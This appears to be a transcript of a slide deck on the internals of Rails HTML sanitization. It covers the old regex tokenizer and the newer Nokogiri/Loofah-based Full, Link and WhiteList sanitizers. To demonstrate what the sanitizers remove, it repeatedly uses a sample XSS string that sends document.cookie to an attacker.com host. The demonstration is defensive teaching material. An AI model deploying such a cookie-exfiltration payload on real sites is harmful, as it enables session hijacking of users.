Rails: The hidden parts

# => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil

tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end

def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

Nodes nodes = tokenize(bad_string) # => [#<HTML::Text:..., …] ! nodes.map

{ |node| node.class } # => [HTML::Text, HTML::Tag, HTML::Text, # HTML::Tag, HTML::Text, HTML::Tag, HTML::Text]

# [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens

# [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

Sanitizer

def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result= [] while token =

tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) process_node(node, result) end result end ! def process_node(node, result) result << node.to_s end

def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result= [] while token =

tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) process_node(node, result) end result end ! def process_node(node, result) result << node.to_s end

Sanitizers • FullSanitizer! • LinkSanitizer! • WhiteListSanitizer

def process_node(node, result) result << node.to_s if node.class == Node::Text

end Full Sanitizer

Problems • code is hard to maintain • use regular

expressions to tokenize the string • very error prone • changing this code can open security holes

Rails Html Sanitizer rafaelfranca/rails-html-sanitizers

Google Summer of Code

@kaspth

Powered by Nokogiri

doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

# => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n"> # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[ # => #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n... # => ]>

doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

Powered by Loofah

doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"

doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

How the new implementation works

Tokenizer

It is Nokogiri

Sanitizers • FullSanitizer! • LinkSanitizer! • WhiteListSanitizer

FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

href='more.html'>See more here</a>…" ) # => Bold no more! See more here...

FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

LinkSanitizer link_sanitizer = Rails::Html::LinkSanitizer.new ! link_sanitizer.sanitize( '<a href="example.com">Only the link

text will be kept.</a>’ ) # => Only the link text will be kept.

LinkSanitizer link_sanitizer = Rails::Html::LinkSanitizer.new ! link_sanitizer.sanitize( '<a href="example.com">Only the link

WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)

Rails: The hidden parts

Rails: The hidden parts

More Decks by Rafael França

Other Decks in Technology

Featured

Transcript